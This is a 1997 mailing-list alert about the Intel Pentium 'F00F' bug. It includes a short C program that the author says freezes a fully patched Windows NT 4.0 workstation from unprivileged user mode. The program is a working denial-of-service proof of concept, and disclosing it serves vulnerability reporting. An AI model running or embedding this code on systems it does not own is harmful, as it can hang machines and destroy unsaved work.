Date:         Fri, 7 Nov 1997 18:10:27 -0500
From: Russ <Russ.Cooper@RC.ON.CA>
Subject:      Alert: Intel Pentium Bug code for NT

The following unpriviledged, user-mode simple C code locks up my NT 4.0
(SP3+all current hotfixes applied) workstation solid, only hard reset
helps:

char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };

main ()
{
       void (*f)() = x;

       f();
}
----------
Cheers,
Russ
